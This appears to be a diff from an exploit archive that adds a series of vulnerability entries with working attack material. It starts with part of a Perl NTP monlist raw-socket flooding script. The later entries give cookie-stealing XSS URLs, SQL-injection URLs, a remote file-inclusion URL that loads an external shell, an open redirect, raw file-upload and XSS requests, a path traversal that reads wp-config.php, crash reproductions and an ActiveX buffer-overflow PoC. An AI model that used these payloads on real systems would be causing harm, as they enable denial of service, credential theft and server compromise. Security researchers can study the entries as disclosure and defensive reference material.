my $request = 0x2a; # Request code is an implementation-specific code which specifies the
# operation to be (which has been) performed and/or the
# format and semantics of the data included in the packet
# 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),
# 0x04 (SYS_STATS), 0x2a (MON_GETLIST)
# NTP packet
my $ntphdr = pack(
'W2 C2 C2 C2',
$rm_vn_mode,
$auth,
$implementation,
$request
);
return $ntphdr;
}
sub send_packet {
while(1){
select(undef, undef, undef, 0.30); # Sleep 300 milliseconds
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;
}
}

11
platforms/php/webapps/37537.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/54660/info
phpProfiles is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to execute malicious code within the context of the web server process, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected.
http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS]
http://www.example.com/full_release/community.php?comm_id=[SQL]
http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt?

11
platforms/php/webapps/37539.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/54670/info
REDAXO is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
REDAXO 4.4 is vulnerable; prior versions may also be affected.
http://www.example.com/redaxo/index.php?page=user&subpage=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
http://www.example.com/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54677/info
Odudeprofile Component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Odudeprofile 2.7 and 2.8 are vulnerable; prior versions may also be affected.
http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL)

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54698/info
tekno.Portal is prone to an SQL-injection vulnerability.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
tekno.Portal 0.1b is vulnerable; other versions may also be affected.
http://www.example.com/teknoportal/anket.php?id=[SQLi]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54715/info
ocPortal is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
Versions prior to ocPortal 7.1.6 are vulnerable.
http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com

38
platforms/php/webapps/37547.txt Executable file
View file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/54725/info
Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>

41
platforms/php/webapps/37548.txt Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/54726/info
Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave

39
platforms/php/webapps/37551.txt Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/54734/info
phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
phpBB 3.0.10 is vulnerable; other versions may also be affected.
Request :
---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close
viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54739/info
JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation.
http://www.example.com/player.swf?playerready=alert(document.cookie)

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54741/info
eNdonesia is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eNdonesia 8.5 is vulnerable; other versions may also be affected.
http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54753/info
Limny is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Limny 3.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL

13
platforms/php/webapps/37556.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/54757/info
Distimo Monitor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Distimo Monitor 6.0 is vulnerable; other versions may also be affected.
https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1
https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1
https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E
https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E
https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30

62
platforms/php/webapps/37559.txt Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.
====================
DESCRIPTION
====================
A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.
The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.
==============
POC
==============
# http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.
==================
VULNERABLE CODE
==================
Located in cp-image-store.php
function cpis_download_file(){
...
if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
}else{
@unlink( CPIS_DOWNLOAD.'/.htaccess');
header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
}
...
}
==================================
time-line
2015-07-01: vulnerability found
2015-07-09: reported to vendor
2015-07-10: released CP Image Store with Slideshow new version 1.0.6
2015-07-10: full disclosure
===================================

91
platforms/php/webapps/37560.txt Executable file
View file

@ -0,0 +1,91 @@
# Exploit Title: WordPress cp-multi-view-calendar.1.1.7 [Unauthenticated SQL injection vulnerabilities]
# Date: 2015-07-10
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip
# Version: 1.1.7
# Tested on: windows 7 + sqlmap 0.9.
# OWASP Top10: A1-Injection
====================
DESCRIPTION
====================
Multiple SQL Injection vulnerabilities has been detected in the Wordpress cp-multi-view-calendar plugin in version 1.1.7 .
The vulnerability allows remote attackers to inject own sql commands to compromise the affected web-application and connected dbms.
The SQL Injection vulnerabilities are located in the `edit.php` and `datafeed.php` files.
Remote attackers are able to inject own sql commands to the vulnerable parameters value in these files GET/POST method request.
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the sql injection vulnerability results in application and
web-service or dbms compromise.
===================
Severity Level
===================
Critical
=================================
AFFECTED URLs AND PARAMETER(S)
=================================
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=[SQLi]
Vulnerable parameter: `id`
Explotation technique: blind (time-based) , union query based.
-------------------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=[SQLi]
Vulnerable parameter: `calendarId`
Explotation technique: blind (boolean based, time based), error based.
-----------------------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=[SQLi]
Vulnerable parameter: `calid`
Explotation technique: blind (boolean based, time based)
-----------------------------------------------------------------------
it isn't all sqli vulnerabilities, but these are the vulnerable functions:
In file datafeed.php
-checkIfOverlapping(...)
-updateDetailedCalendar(...)
-removeCalendar(...)
In file edit.php
-getCalendarByRange(...)
... I think this is all..
Sorry. I didn't have much time for this report.
==================================
time-line
2015-07-01: vulnerabilities found
2015-07-09: reported to vendor
2015-07-10:
2015-07-12:
===================================

39
platforms/windows/dos/37526.txt Executable file
View file

@ -0,0 +1,39 @@
# Title: Immunity Debugger - Crash
# Date: 08/07/2015
# Author: Arsyntex
# Vendor Homepage: http://www.immunityinc.com/products/debugger/
# Version: v1.85
# Tested on: Windows 8.1 Pro
Incorrect path/file EXtEnsion parsing.
-Create folder with the name: .exe.exe and put any program inside and try debug it.
-Try to debug an executable with the name: test.exe.exe or lib.exe.dll
The "OpenEXEfile" function does not check if the return value of strchr() is zero.
----------------------------------------------------------------------------------
loc_4B8182:
mov [esp+10h+var_10], edi
add edi, 4
mov [esp+10h+var_C], 20h
mov [esp+10h+arg_24], eax
call strchr ; return EAX=3D 0
mov [esp+10h+var_10], eax
mov [esp+10h+arg_28], eax ; (!)
call strlen ; ntdll.strlen(s)
---------------------------------------------------------------------
ntdll.strlen(s) - NULL parameter
---------------------------------------------------------------------
ntdll_strlen:
mov ecx, [esp+4] ; [esp+4] =3D 0 NULL pointer
test ecx, 3 ; ...
jz short loc_77C77510 ; jump
...
loc_77C77510:
mov eax, [ecx] ; Access Violation
---------------------------------------------------------------------

21
platforms/windows/dos/37558.txt Executable file
View file

@ -0,0 +1,21 @@
# Title: Notepad++ - Crash
# Date: 10/07/2015
# Author: Rahul Pratap Singh (@0x62626262)
# Vendor Homepage: https://notepad-plus-plus.org
# Download: https://notepad-plus-plus.org/download/v6.7.3.html
# Version: v6.7.3
# Tested on: Windows_XP_x86 & Windows_7_x86
Incorrect theme file parsing, that leads to crash.
-Create a .xml file with numbereous "A" (around 1000) in it and save as
test.xml
-Go to this directory in windows "/appdata/roaming/notepad++/themes/" and
paste above test.xml file in this theme folder and restart notepad++
-Now start notepad++ and in menu tab, go in settings and then select style
configurator and now select test file in theme select option
-Now hit "save and close" button, it will crash with an error message
Thanks
Rahul Pratap Singh

View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/54701/info
BarCodeWiz ActiveX control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input.
An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
Successful exploits will allow attackers to execute arbitrary code within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
BarCodeWiz 4.0.0.0 is vulnerable to this issue; other versions may be affected as well.
<html>
Exploit
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc'
/></object>
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX
Trial\DLL\BarcodeWiz.dll"
prototype = "Property Let Barcode As String"
memberName = "Barcode"
progid = "BARCODEWIZLib.BarCodeWiz"
argCount = 1
arg1=String(14356, "A")
poc.Barcode = arg1
</script>